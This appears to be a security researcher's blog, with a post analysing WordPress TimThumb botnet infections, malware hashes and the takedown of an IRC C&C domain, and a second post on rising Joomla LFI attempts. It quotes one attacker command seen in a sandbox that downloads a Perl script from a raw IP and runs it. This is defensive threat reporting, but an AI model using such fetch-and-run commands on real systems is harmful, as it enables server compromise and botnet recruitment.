gangbang.mytijn.org Malware Spreader Down

By analyzing the payloads and associated C&C used by the WordPress Timthumb botnets, I founded an interesting C&C server named “gangbang.mytijn.org“. And in collaboration with Luxembourg CIRCL, the domain gangbang.mytijn.org is down since the 14 December 2011. This C&C server was known for spreading tonnes of malwares on Internet.

The initial infected WordPress sites were :

  • 222.255.77.90 – AS7643 – Vietnam

This infected server was first seen the 2011-11-05 18:54:22 and last seen the 2011-11-28 05:05:55. 214 distinct source IPs have call malwares hosted on three different virtual hosts. These three virtual hosts were blogger.com.dollhousedelights.comimg.youtube.com.dollhousedelights.com and blog.ssis.edu.vn.

blogger.com.dollhousedelights.com has spread 2 different malwares (PHP backdoor):

/.mods/sh.php - MD5: 027d17ab2ef49d442377c126dfa8fd1f - First seen the 2011-11-05 18:55:02
/.mods/index.php - MD5: 51ad7df89f3e7162128b9d642a7ec75b - First seen the 2011-11-05 18:55:05

img.youtube.com.dollhousedelights.com has spread 4 different malwares :

/.mods/sh.php - MD5: b545d6934b776026e6bbfd1f7ef4bb27 - First seen the 2011-11-17 07:37:15
/.mods/sh.php - MD5: acbc38367ffd62c42e1ae20c24890b55 - First seen the 2011-11-23 01:50:04
/.mods/index.php - MD5: 4ba8b20decc7605720ce2637ae51893c - First seen the 2011-11-27 23:50:04
/.mods/sh.php - MD5: ec1766b6a365db5099f53c85ad2ed2f1 - First seen the 2011-11-28 02:25:04

All “sh.php” malwares were PHP backdoor, and the “index.php” was a PHP IRC bot.

blog.ssis.edu.vn has spread one malware (PHP backdoor):

/.mods/pbot.txt? - MD5: 8da596365d76ce39bee05c75c2c0030b - First seen the 2011-11-17 07:25:05
  • 192.83.167.206 – AS9505 – Taiwan

This infected server was first seen the 2011-11-28 03:30:09 and last seen the 2011-12-08 03:06:44. 71 distinct source IPs have call malwares hosted on three different virtual hosts. These three virtual hosts were blogger.com.dollhousedelights.comimg.youtube.com.dollhousedelights.com and img.youtube.com.midislandrental.com. As you can see blogger.com.dollhousedelights.com and img.youtube.com.dollhousedelights.comwere load balanced (DNS round robin).

blogger.com.dollhousedelights.com has spread 1 malware (PHP Backdoor):

/.mods/pbot.txt? - MD5: 8da596365d76ce39bee05c75c2c0030b - First seen the 2011-11-28 03:35:03

img.youtube.com.dollhousedelights.com has spread 3 different malwares:

/.mods/sh.php - MD5: 027d17ab2ef49d442377c126dfa8fd1f - First seen the 2011-11-28 05:20:03
/.mods/index.php - MD5: 4ba8b20decc7605720ce2637ae51893c - First seen the 2011-11-28 05:35:07
/.mods/sh.php - MD5: e2b94559ff0c3d9219b3a43bf6dcd8bd - First seen the 2011-11-29 07:15:03

All “sh.php” malwares were PHP backdoor, and the “index.php” was a PHP IRC bot.

  • Analyzing the C&C servers

The PHP IRC bot was interesting, cause he invoke the potential first C&C server. You can find the encoded and decoded versions of the PHP IRC bot on pastbin. This script also permit to execute commands on the affected server and execute UDP or TCP flood attacks.

You can see that the first C&C server is gangbang.mytijn.org on port 23232/TCP and the #wWw# channel is protected by password. Also it is required to display a particular nick name, ident and real name in order to be identified on the IRC server.

Also by digging gangbang.mytijn.org domain name at different time, we can see that the domain was load balanced by using DNS round robin method. Each IP addresses present in the round robin load balancing had also the port 23232/TCP open.

By playing with Cuckoo Sandbox, the first C&C owners have execute some commands on the sandbox, and permit me to analyse the java.txt file.

cd /tmp && rm -rf java.txt && wget http://72.41.115.123/.mods/java.txt && chmod 755 java.txt && perl java.txt && … && rm -rf java.txt

You can also find the java.txt script on pastebin. This script connects to second C&C server, making the first C&C only a proxy. But this script also permit to execute different attacks like RFI, LFI, SQL injection and targeting specific web applications like e107, osCommerce and WordPress.

The second C&C server is known as irc.javairc.org on port 6667/TCP. Most of the affected machines were located on this IRC server.

Some funny conversations were made by the C&C owners and all this conversations were done in Indonesian.

Local File Inclusion attempts on the rise

They’re is no new day without a Joomla Local File Inclusion (LFI) vulnerability. Just take a look at Exploit-DB, Inj3ct0r or Hack0wn and you will find thousands of Joomla components vulnerable to this vulnerability.

Since many years, security researcher have write studies on this vulnerability, and describe the different way to exploit them. You can find some good papers about LFI exploitations on Exploit-DB. But since 2010, LFI are coming back in force.

LFI vulnerability doesn’t look like to be dangerous in a first manner, but maybe we have to make a quick recap on the potential impacts to be vulnerable :

  • Exposure of sensitive informations (clear or hashed password, source code, documents leakage, etc.)
  • Exposure of system informations (system informations, users list, runtime informations, etc.)
  • Security bypass (normally inaccessible informations could be acceded…)
  • System access (malicious users could gain access to the system and compromise him)
  • Be involved in a botnet without knowing it
  • etc.

Why Local File Inclusion (LFI) attemps are on the rise ? The answer is very simple, cause Remote File Inclusion (RFI) are stagnating or even declining. Just do a simple research on Exploit-DB for RFI, you will directly see the difference with the LFI search. RFI vulnerabilities are very simple to exploit unlike LFI vulnerabilities. To argument, I propose you to visit our one year RFI HoneyNet statistics, you will see the increasing activity of RFI botnets. But the number of RFI exploits are decreasing continuously since the hype of 2006 and 2007. Compromised hosts by LFI are integrated into RFI botnets.

Despite LFI exploitation fail in 90% of cases (due to the OS, web server or PHP default hardening), if you scan 1000 hosts you can finally compromise 100 of them. LFI compromised hosts are compensating the decrease of RFI compromised hosts by RFI exploits. In such manner, we can see since 2010 apparition of dedicated Joomla LFI dork lists and mutation of traditional RFI scanners to LFI/RFI scanners (LRFI). The 2010 mutation of all traditional RFI scanner is also now to integrate XML RPC and SQL injection scanners, with nice updated dork lists.

We provide you a list of all unique LFI attempts on our HoneyNet for the latest 24 hours. This list will be updated daily and will permit you to follow the new vulnerable web applications.

So just a final word, take care on your /proc/self/environ, and special dedication to Indonesia 🙂 If you are curious, take a look to the Indonesian scene.